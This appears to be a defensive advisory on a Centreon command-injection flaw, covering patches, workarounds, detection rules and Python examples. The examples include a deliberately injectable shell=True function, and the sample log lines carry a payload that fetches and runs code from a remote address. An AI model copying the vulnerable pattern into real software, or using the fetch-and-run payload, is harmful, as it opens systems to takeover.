CVE-2025-5946
📋 TL;DR
This OS command injection vulnerability in Centreon Infra Monitoring allows authenticated high-privilege users to inject arbitrary commands into poller reload operations. Attackers could execute system commands with the privileges of the Centreon web application, potentially leading to full system compromise. Affected versions include Centreon Infra Monitoring from 24.10.0 before 24.10.13, from 24.04.0 before 24.04.18, and from 23.10.0 before 23.10.28.
💻 Affected Systems
- Centreon Infra Monitoring
📦 What is this software?
Centreon Web by Centreon
⚠️ Risk & Real-World Impact
Worst Case
Command execution as the web server user on the central Centreon server, escalated to root (Centreon installs sudo rules that let that user restart the engine and related services), followed by theft of the credentials the central server holds for every monitored host and poller (SNMP communities, database and API passwords used by plugins, the keys used to drive the pollers), lateral movement over those channels, and a persistent backdoor on a host that legitimately talks to the whole estate.
Likely Case
Arbitrary command execution as the web server user on the central Centreon server, which is enough to read the application configuration (including database credentials), tamper with monitoring, and disrupt the service.
If Mitigated
Limited impact if proper network segmentation and least privilege principles are enforced, restricting lateral movement.
🎯 Exploit Status
Exploitation requires an authenticated account with access to poller configuration (an administrator, or a user whose Centreon ACL grants that menu), but once that access exists the injection is technically simple: a crafted value in a poller reload request, with no memory corruption or timing involved.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 24.10.13, 24.04.18, 23.10.28
Vendor Advisory: https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-5946-centreon-web-all-versions-high-severity-5104
Restart Required: Yes
Instructions:
1. Back up the Centreon configuration and databases (centreon and centreon_storage).
2. Update to the patched version of your branch with the package manager (dnf/yum update centreon on RHEL-family systems, apt upgrade centreon on Debian-family systems).
3. Restart the Centreon services (systemctl restart centreon).
4. Verify the installed version and that pollers still export and reload their configuration.
🔧 Temporary Workarounds
Restrict Poller Parameter Access
Temporarily restrict access to the poller configuration page (main.php?p=60909) to the administrator network. Apache <Location> and <Directory> sections match only the path, never the query string, so a <Location "/centreon/main.php?p=60909"> block would never match; the page id has to be checked with mod_rewrite (or an <If> expression on %{QUERY_STRING}) instead:
# Apache 2.4 example: deny the poller page unless the client is in 10.0.0.0/8
RewriteEngine On
RewriteCond %{REQUEST_URI}  ^/centreon/main\.php$
RewriteCond %{QUERY_STRING} (^|&)p=60909(&|$)
RewriteCond %{REMOTE_ADDR}  !^10\.
RewriteRule ^ - [F]
This limits who can reach the page, not what an authorised administrator can submit: a compromised admin account inside 10.0.0.0/8 is unaffected, and any other entry point to the same reload operation (for example the REST API, if it exposes it) is not covered.
Implement Input Validation
Centreon provides no hook for a script of this kind on the poller reload path, so the check below cannot be dropped in as a workaround; it shows the allowlist that the vendor patch, or a WAF rule in front of the page, should enforce on the poller name: only letters, digits, underscore and hyphen, which leaves no room for a shell metacharacter.
# Allowlist check on a poller parameter (illustrative; reject anything outside the set)
if [[ ! "$POLLER_PARAM" =~ ^[a-zA-Z0-9_-]+$ ]]; then
echo "Invalid input detected: $POLLER_PARAM" >&2
exit 1
fi
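The injection itself, as an added example that is not Centreon's code: the command-construction pattern that turns a poller name into extra shell commands, beside two hardened forms. The reload command is a stand-in (an echo); what Centreon actually executes is not shown on this page and is not assumed here. The allowlist regex is the same one as the shell check above.

```python
"""
Added example (not Centreon's code): the command-construction pattern behind an
OS command injection in a poller reload, beside two hardened forms.  The reload
command is a stand-in (an `echo`); what Centreon actually executes is not shown
on the page and is not assumed here.
"""
import re
import subprocess

# Allowlist for a poller name, the same idea as the shell check above.
POLLER_NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def vulnerable_reload(poller_name: str) -> str:
    """Vulnerable pattern: the user-controlled value is interpolated into a
    shell command line, so metacharacters in it become additional commands."""
    cmd = f"echo reloading poller {poller_name}"  # stand-in for the real reload command
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


def argv_only_reload(poller_name: str) -> str:
    """First fix: no shell at all.  The value travels as one argv element, so a
    payload such as 'central; echo INJECTED' is just an odd poller name and no
    second command runs."""
    proc = subprocess.run(["echo", "reloading", "poller", poller_name],
                          capture_output=True, text=True)
    return proc.stdout


def hardened_reload(poller_name: str) -> str:
    """Defence in depth: allowlist the value before it reaches argv, so the odd
    name is rejected instead of being handed to the reload tooling at all."""
    if not POLLER_NAME_RE.fullmatch(poller_name):
        raise ValueError(f"rejected poller name: {poller_name!r}")
    return argv_only_reload(poller_name)


if __name__ == "__main__":
    payload = "central; echo INJECTED"
    print("vulnerable:", repr(vulnerable_reload(payload)))
    print("argv only: ", repr(argv_only_reload(payload)))
    try:
        hardened_reload(payload)
    except ValueError as err:
        print("hardened:  ", err)
```

The argv form is the actual fix for the bug class; the allowlist is there so that a malformed name is refused early and logged rather than passed on to whatever runs next.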
🧯 If You Can't Patch
- Implement strict network segmentation to isolate Centreon servers from critical systems
- Enforce least privilege principle for Centreon user accounts and monitor for suspicious activity
🔍 How to Verify
Check if Vulnerable:
Compare the installed centreon-web version with the fixed version of the same branch: 24.10.0 up to 24.10.12, 24.04.0 up to 24.04.17 and 23.10.0 up to 23.10.27 are vulnerable. The version is shown in the web interface (Administration > About) or by the package manager.
Check Version:
rpm -q centreon-web || dpkg -l centreon-web
Verify Fix Applied:
The installed version must be at least the fixed version of its own branch (24.10.13, 24.04.18 or 23.10.28). "Or higher" only holds within a branch: a 24.10.x release below 24.10.13 is still vulnerable even though it is numerically above 24.04.18. Then confirm that exporting and reloading a poller configuration from Configuration > Pollers still completes.
📡 Detection & Monitoring
Log Indicators:
- Requests to the poller page (main.php?p=60909 in the web server access log) from unexpected users or source addresses, or in unusual volume from a single user
- Shell metacharacters (;, |, &, $, `) or their URL-encoded forms (%3B, %7C, %26, %24, %60) in poller parameters
- Child processes of the web server (httpd/apache2 or php-fpm) other than the expected reload command, for example sh -c invoking curl, wget, bash, python or nc
Network Indicators:
- Unexpected outbound connections from the Centreon central server, beyond its normal traffic to pollers and monitored hosts
- SSH or reverse shell connections originating from the web server process tree rather than from the monitoring engine or its plugins
SIEM Query (Splunk-style template; point source at the indexed web server access log and adjust field names to what your access-log sourcetype extracts):
source="/var/log/httpd/access_log" uri_path="/centreon/main.php" uri_query="*p=60909*" AND (uri_query="*;*" OR uri_query="*|*" OR uri_query="*`*" OR uri_query="*$*" OR uri_query="*%3B*" OR uri_query="*%7C*" OR uri_query="*%60*" OR uri_query="*%24*")
Parameters sent in a POST body do not appear in the access log, so this query only catches values carried in the query string; for POST requests, application-level request logging or a reverse proxy that logs bodies is needed.
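The detection logic above, run over sample access-log lines, as an added example that is not part of the original page or of Centreon: it decodes the query string (so URL-encoded metacharacters are not missed), flags poller parameters carrying shell metacharacters, and counts poller-page requests per client. The log lines, addresses and the `poller` parameter name are constructed for the example.

```python
"""
Added example, not Centreon's code: a detector over Apache access-log lines for
the poller page (main.php?p=60909, the page id used in the workaround above).
The log lines, client addresses and the `poller` parameter name are constructed.
"""
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Apache combined-format prefix: client, ident, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
SHELL_META = re.compile(r"[;|&$`\n]")  # characters that end or chain a shell command
POLLER_PAGE = "60909"

# Constructed sample: one admin session, one client probing with encoded payloads,
# one unrelated request.  The access log stores the target percent-encoded.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - admin [12/Aug/2025:10:01:02 +0000] "GET /centreon/main.php?p=60909 HTTP/1.1" 200 5123
10.0.0.5 - admin [12/Aug/2025:10:01:09 +0000] "POST /centreon/main.php?p=60909&o=c&poller=central HTTP/1.1" 200 812
198.51.100.7 - - [12/Aug/2025:10:02:30 +0000] "GET /centreon/main.php?p=60909&poller=central%3Bcurl+http%3A%2F%2F198.51.100.7%2Fx%7Csh HTTP/1.1" 200 812
198.51.100.7 - - [12/Aug/2025:10:02:31 +0000] "GET /centreon/main.php?p=60909&poller=central%60id%60 HTTP/1.1" 200 812
10.0.0.9 - - [12/Aug/2025:10:03:00 +0000] "GET /centreon/index.php HTTP/1.1" 200 2231
"""


def poller_page_params(target):
    """Return the decoded query parameters when the request targets the poller
    page, otherwise None."""
    parts = urlsplit(target)
    if parts.path != "/centreon/main.php":
        return None
    params = parse_qsl(parts.query, keep_blank_values=True)  # percent-decodes values
    if ("p", POLLER_PAGE) not in params:
        return None
    return params


def analyze(log_text):
    """Scan access-log text.  Returns (alerts, per_client): alerts is a list of
    (client, parameter, decoded value) for values holding shell metacharacters,
    per_client counts poller-page requests by client address."""
    alerts = []
    per_client = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        params = poller_page_params(m.group("target"))
        if params is None:
            continue
        per_client[m.group("ip")] += 1
        for name, value in params:
            if name != "p" and SHELL_META.search(value):
                alerts.append((m.group("ip"), name, value))
    return alerts, per_client


if __name__ == "__main__":
    found, counts = analyze(SAMPLE_ACCESS_LOG)
    for client, name, value in found:
        print(f"ALERT {client} {name}={value!r}")
    print("poller-page requests per client:", dict(counts))
```

Only GET parameters are visible this way; the POST line in the sample carries its parameters in the query purely for illustration, and a real POST body would have to come from application or reverse-proxy request logging. Decoding before matching is what catches the %3B and %60 payloads that a raw-character search would miss.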